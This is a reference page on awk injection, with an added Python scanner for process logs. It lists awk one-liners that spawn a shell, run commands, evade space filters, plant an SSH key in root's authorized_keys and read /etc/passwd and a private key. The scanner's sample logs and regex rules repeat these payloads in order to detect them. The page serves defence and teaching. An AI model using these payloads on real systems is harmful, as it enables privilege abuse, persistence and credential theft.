Awk injection is no different from other command injection vulnerabilities, including SQL injection: untrusted input that lands inside an awk program can change what the program does. Awk is an incredibly powerful (yet simple) tool, so the possibilities are endless. See this report for an example.
It can be used to break out from restricted environments by spawning an interactive system shell.
Can be used to execute arbitrary commands on a system and spawn shells.
awk 'BEGIN{system("/bin/sh")}'
It can be used to break out from the intended program by running non-interactive system commands.
Can be used to execute arbitrary commands on a system.
awk 'BEGIN {system("ls"); exit}' /dev/null
The file must exist, and the command will be executed once for every line in the file.
awk 'system("ls")' /etc/passwd
If spaces cannot be inserted, we can use sprintf("%c",32) to emulate them.
awk '//{}BEGIN{system(sprintf("uname%c-aa",32))}'
It writes data to files, so it may be used to do privileged writes or to write files outside a restricted file system.
Write to an arbitrary file.
awk 'BEGIN{print "ssh-rsa ..." > "/root/.ssh/authorized_keys"}' /dev/null
It reads data from files, so it may be used to do privileged reads or to disclose files outside a restricted file system.
Read an arbitrary file.
awk 'BEGIN{while((getline line<"/etc/passwd")>0){print line}}' /dev/null
Print the contents of multiple files.
awk '//' /etc/passwd /etc/hostname /root/.ssh/id_rsa
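As an added defender's example, not part of the original page: a small Python scanner that flags awk command lines using the primitives listed above (system(), sprintf("%c") whitespace obfuscation, print/printf redirection into a file, getline from a file) and access to sensitive paths, run over constructed sample log lines. The "user cmdline" log format and the sensitive-path list are assumptions, and the scanner also covers "cmd" | getline, which the page does not list but which runs a command as well.

```python
import re
from typing import List, Tuple

# Constructed process-execution log lines in a hypothetical "user cmdline" format
# (not taken from any real system); the first and last are benign admin usage.
SAMPLE_LOG = [
    "alice awk '{print $1}' /var/log/syslog",
    "bob awk 'BEGIN{system(\"/bin/sh\")}'",
    "svc awk 'BEGIN {system(\"ls\"); exit}' /dev/null",
    "svc awk '//{}BEGIN{system(sprintf(\"uname%c-aa\",32))}'",
    "web awk 'BEGIN{print \"ssh-rsa ...\" > \"/root/.ssh/authorized_keys\"}' /dev/null",
    "web awk 'BEGIN{while((getline line<\"/etc/passwd\")>0){print line}}' /dev/null",
    "ops awk '//' /etc/passwd /etc/hostname /root/.ssh/id_rsa",
    "alice awk -F: '$3 == 0' /etc/passwd",
]

# (name, regex over the awk program text) mirroring the primitives on this page:
# system() runs commands, sprintf("%c") hides whitespace, print/printf redirection
# writes files, getline < "file" reads them; "cmd" | getline also runs a command.
PROGRAM_RULES: List[Tuple[str, re.Pattern]] = [
    ("system_call", re.compile(r"\bsystem\s*\(")),
    ("pipe_to_getline", re.compile(r"\|&?\s*getline\b")),
    ("char_obfuscation", re.compile(r'\bsprintf\s*\(\s*"[^"]*%c')),
    ("output_redirect", re.compile(r'\bprintf?\b[^>]*>>?\s*"')),
    ("getline_file_read", re.compile(r'\bgetline\b[^<|]*<\s*"')),
]
# Substrings of paths whose presence anywhere on the command line deserves review.
SENSITIVE_PATHS = ("/root/", "/etc/shadow", ".ssh/", "id_rsa", "authorized_keys")
# awk [options] 'program' [files...]; options are assumed to be single tokens.
AWK_INVOCATION = re.compile(r"\bawk\b(?:\s+-\S+)*\s+'([^']*)'")


def analyze_awk_command(cmdline: str) -> List[str]:
    """Return the names of every rule the awk invocation in cmdline triggers."""
    if not re.search(r"\bawk\b", cmdline):
        return []
    match = AWK_INVOCATION.search(cmdline)
    program = match.group(1) if match else ""
    hits = [name for name, rule in PROGRAM_RULES if rule.search(program)]
    if any(path in cmdline for path in SENSITIVE_PATHS):
        hits.append("sensitive_path")
    return hits


def scan_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (line, hits) for each log line that triggers at least one rule."""
    return [(line, hits) for line in lines if (hits := analyze_awk_command(line))]
```

Feed it the command-line field of your process-execution telemetry; ordinary admin usage such as awk -F: over /etc/passwd produces no hits, while each of the breakout forms above trips at least one rule.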